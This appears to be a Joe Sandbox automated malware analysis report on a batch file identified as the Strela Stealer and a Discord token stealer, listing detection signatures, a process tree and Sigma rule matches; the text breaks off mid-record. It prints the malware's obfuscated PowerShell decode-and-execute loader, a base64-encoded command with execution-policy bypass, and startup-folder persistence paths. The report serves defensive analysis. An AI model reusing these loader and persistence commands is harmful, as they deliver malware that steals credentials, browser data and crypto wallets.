Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
email.bat

Overview

General Information

Sample name:email.bat
Analysis ID:1629935
MD5:d083c2b26222174127ff97877937148e
SHA1:6695b33afb320669e877c7d8ab80301372deb4bd
SHA256:9b5aab389e76144585b06720fb08ccbd92450f52f5b13c8bca7b3a53d7aa1a56
Tags:213-209-150-200batuser-JAMESWT_MHT
Infos:

Detection

Discord Token Stealer, Strela Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Powershell Decrypt And Execute Base64 Data
Yara detected Discord Token Stealer
Yara detected Generic Stealer
Yara detected Powershell decode and execute
Yara detected Strela Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Creates a thread in another existing process (thread injection)
Drops script or batch files to the startup folder
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Injects code into the Windows Explorer (explorer.exe)
Joe Sandbox ML detected suspicious sample
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell IEX Execution Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Inline Execution From A File
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 560 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\email.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2908 cmdline: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 2720 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 5296 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA2A.tmp" "c:\Users\user\AppData\Local\Temp\mlbsu2za\CSCA5922EEFCE0C4CCF862EBFA9D2B24469.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmd.exe (PID: 7320 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkkijTOJSHGJxxcmgeA.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7380 cmdline: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA= MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
              • taskkill.exe (PID: 7580 cmdline: "C:\Windows\system32\taskkill.exe" /IM ping.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
              • cmd.exe (PID: 7632 cmdline: "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • PING.EXE (PID: 7696 cmdline: C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t MD5: B3624DD758CCECF93A1226CEF252CA12)
              • csc.exe (PID: 7992 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zozwmnym.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
                • cvtres.exe (PID: 8008 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES50A7.tmp" "c:\Users\user\AppData\Local\Temp\CSC45E487DD8415477BBDD6263064315E51.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • taskkill.exe (PID: 7032 cmdline: "C:\Windows\system32\taskkill.exe" /IM ping.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • cmd.exe (PID: 5296 cmdline: "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 7032 cmdline: C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t MD5: B3624DD758CCECF93A1226CEF252CA12)
      • csc.exe (PID: 7252 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 7280 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES23DA.tmp" "c:\Users\user\AppData\Local\Temp\fhrgxrvn\CSCCE48297965FB4312A543AE9B3ACACFC0.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000002.2491155636.00000000028E0000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x2cc8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x625e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000017.00000002.2509704658.0000000006C50000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000A.00000002.2230659559.0000000007410000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000006.00000000.1728817943.00000000011B0000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
        • 0x2cd2:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
        • 0x6268:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
        Click to see the 16 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        23.2.PING.EXE.6c50000.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          10.2.PING.EXE.7410000.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_2908.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Base64 Encoded PowerShell Command Detected
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine|base64offset|contains: <!., Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\email.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 560, ParentProcessName: cmd.exe, ProcessCommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", ProcessId: 2908, ProcessName: powershell.exe
              Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine|base64offset|contains: <!., Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\email.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 560, ParentProcessName: cmd.exe, ProcessCommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", ProcessId: 2908, ProcessName: powershell.exe
              Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
              Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\SysWOW64\PING.EXE, SourceProcessId: 7032, StartAddress: 72C3B510, TargetImage: C:\Windows\System32\taskkill.exe, TargetProcessId: 7032
              Sigma detected: Suspicious Encoded PowerShell Command Line
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, CommandLine: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, CommandLine|base64offset|contains: !, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkkijTOJSHGJxxcmgeA.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7320, ParentProcessName: cmd.exe, ProcessCommandLine: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, ProcessId: 7380, ProcessName: powershell.exe
              Sigma detected: Suspicious PowerShell Encoded Command Patterns
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, CommandLine: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, CommandLine|base64offset|contains: !, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkkijTOJSHGJxxcmgeA.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7320, ParentProcessName: cmd.exe, ProcessCommandLine: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, ProcessId: 7380, ProcessName: powershell.exe
              Sigma detected: Suspicious PowerShell IEX Execution Patterns
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine|base64offset|contains: <!., Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\email.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 560, ParentProcessName: cmd.exe, ProcessCommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", ProcessId: 2908, ProcessName: powershell.exe
              Sigma detected: Suspicious PowerShell Parameter Substring
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1, CommandLine|base64offset|contains: E, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7380, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1, ProcessId: 7496, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1, CommandLine|base64offset|contains: E, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7380, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1, ProcessId: 7496, ProcessName: powershell.exe
              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2908, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline", ProcessId: 2720, ProcessName: csc.exe
              Sigma detected: Powershell Inline Execution From A File
              Source: Process startedAuthor: frack113: Data: Command: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine|base64offset|contains: <!., Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\email.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 560, ParentProcessName: cmd.exe, ProcessCommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", ProcessId: 2908, ProcessName: powershell.exe
              Sigma detected: Suspicious Execution of Powershell with Base64
              Source: Process startedAuthor: frack113: Data: Command: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, CommandLine: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, CommandLine|base64offset|contains: !, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkkijTOJSHGJxxcmgeA.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7320, 